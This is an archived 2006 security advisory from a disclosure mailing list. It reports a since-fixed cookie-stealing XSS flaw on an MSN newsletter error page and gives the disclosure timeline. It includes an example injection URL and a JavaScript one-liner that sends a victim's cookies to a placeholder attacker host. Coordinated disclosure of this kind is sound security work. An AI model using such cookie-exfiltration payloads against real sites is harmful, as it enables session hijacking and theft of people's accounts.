lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200607251156.32435.SPAD@securiteam.com>
Date: Tue, 25 Jul 2006 11:56:30 +0300
From: SecuriTeam Assisted Disclosure <SPAD@...uriteam.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Cc: 
Subject: Cookie-stealing XSS on msn.com

Summary
-------
A cookie-stealing Cross-site scripting vulnerability was found on MSN's 
website (msn.com). Using this vulnerability, an attacker could potentially 
gain access to a victim's Inbox.

This vulnerability was discovered by: tontonq and Nir Goldshlager.

Disclosure timeline
-------------------
SecuriTeam was asked to assist the researchers with contacting Microsoft.

Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.

Technical description
---------------------
A cookie-stealing XSS issue was discovered on MSN's web site.

Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
That error page gets the CB variable into a script tag.

If John Doe wanted to steal a victim's cookie, he could use this example 
Javascript 
code:
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;

As such, if for example, s.php stores the cookie variable somewhere, the 
attacker can set that stored cookie and "jump" to the Inbox.

For illustration, an older similar issue from 2005 on hotmail.com discovered 
by Alex de Vries can be found here:
http://www.net-force.nl/files/articles/hotmail_xss/

About SecuriTeam's Assisted Disclosure
--------------------------------------
Many researchers do not have the time, energy or inclination to deal with 
reporting a vulnerability to vendors.

SecuriTeam is here to help. If you want us to handle the logistics of 
contacting and following up with the vendor, making sure the problem is 
fixed, contact: STAD@...uriTeam.com.

Our end goal is Full Disclosure, preferably in coordination with the vendor, 
without exposing the researcher to unnecessary risk.
We do not believe in hiding or selling vulnerabilities. Never had, never will.

All credit will be properly attributed. If asked we can act as proxies, 
keeping your privacy and anonymity.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ